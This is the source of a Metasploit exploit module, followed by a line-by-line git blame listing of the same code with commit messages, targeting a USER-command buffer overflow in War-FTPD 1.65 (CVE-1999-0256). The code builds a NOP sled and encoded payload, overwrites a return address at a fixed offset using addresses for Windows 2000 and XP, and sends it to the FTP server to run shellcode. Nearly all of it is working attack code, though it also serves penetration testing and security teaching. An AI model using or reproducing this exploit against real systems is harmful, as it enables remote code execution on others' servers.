metasploit-framework/modules/exploits/windows/ftp/warftpd_165_user.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'BID', '10078'	],
					[ 'CVE', '1999-0256'],
					[ 'OSVDB', '875'    ],
					[ 'MIL', '75'       ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					]
				]))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )

		handler
		disconnect
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 01:10:39 +01:00			`##`
Use a default platform git-svn-id: file:///home/svn/framework3/trunk@4475 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-26 11:46:52 +01:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 01:10:39 +01:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 16:33:26 +02:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 01:10:39 +01:00			`##`


Changed up the way mixins are handled, all exploits just require 'msf/core' and all current mixins will be loaded. Egghunter was moved to a mixin and generates based on target arch and platform. git-svn-id: file:///home/svn/incoming/trunk@3111 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 01:04:26 +01:00			`require 'msf/core'`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 07:23:59 +02:00			`class Metasploit3 < Msf::Exploit::Remote`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 07:23:59 +02:00			`include Msf::Exploit::Remote::Ftp`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
			`def initialize(info = {})`
			`super(update_info(info,`
Fixed bad target foo in ftp exploits Added TODO item about native packign git-svn-id: file:///home/svn/incoming/trunk@3070 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 04:46:53 +01:00			`'Name' => 'War-FTPD 1.65 Username Overflow',`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`'Description' => %q{`
			`This module exploits a buffer overflow found in the USER command`
tweaky git-svn-id: file:///home/svn/incoming/trunk@3079 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 18:41:32 +01:00			`of War-FTPD 1.65.`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`},`
extraneouslyness git-svn-id: file:///home/svn/incoming/trunk@3027 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-13 19:35:44 +01:00			`'Author' => 'Fairuzan Roslan <riaf [at] mysec.org>',`
BSD license the default for non-msfdev created modules. git-svn-id: file:///home/svn/incoming/trunk@3636 4d416f70-5f16-0410-b530-b9f4589650da 2006-05-06 18:34:39 +02:00			`'License' => BSD_LICENSE,`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
Reference updates git-svn-id: file:///home/svn/framework3/trunk@4154 4d416f70-5f16-0410-b530-b9f4589650da 2006-11-28 18:18:43 +01:00			`[ 'BID', '10078' ],`
			`[ 'CVE', '1999-0256'],`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`[ 'OSVDB', '875' ],`
			`[ 'MIL', '75' ],`
			`[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process'`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 424,`
			`'BadChars' => "\x00\x0a\x0d\x40",`
			`'StackAdjustment' => -3500,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => "-find"`
			`}`
			`},`
Use a default platform git-svn-id: file:///home/svn/framework3/trunk@4475 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-26 11:46:52 +01:00			`'Platform' => 'win',`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`'Targets' =>`
			`[`
			`# Target 0`
			`[`
			`'Windows 2000 SP0-SP4 English',`
			`{`
			`'Ret' => 0x750231e2 # ws2help.dll`
			`},`
			`],`
			`# Target 1`
			`[`
			`'Windows XP SP0-SP1 English',`
			`{`
			`'Ret' => 0x71ab1d54 # push esp, ret`
			`}`
			`],`
			`# Target 2`
			`[`
			`'Windows XP SP2 English',`
			`{`
			`'Ret' => 0x71ab9372 # push esp, ret`
			`}`
			`]`
remove superfluous default git-svn-id: file:///home/svn/incoming/trunk@3024 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:50:05 +01:00			`]))`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

			`buf = make_nops(600) + payload.encoded`
SEH frame stuff integrated into ftp modules, added generate_seh_payload git-svn-id: file:///home/svn/incoming/trunk@3081 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 19:30:56 +01:00			`buf[485, 4] = [ target.ret ].pack('V')`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
tweaky git-svn-id: file:///home/svn/incoming/trunk@3079 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 18:41:32 +01:00			`send_cmd( ['USER', buf] , false )`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00
			`handler`
Fixed handler/disconnect order in FTP, fixes to metafile git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da 2006-01-08 15:27:59 +01:00			`disconnect`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 02:22:03 +01:00			`end`

Code cleanups git-svn-id: file:///home/svn/framework3/trunk@5773 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-19 23:03:39 +02:00			`end`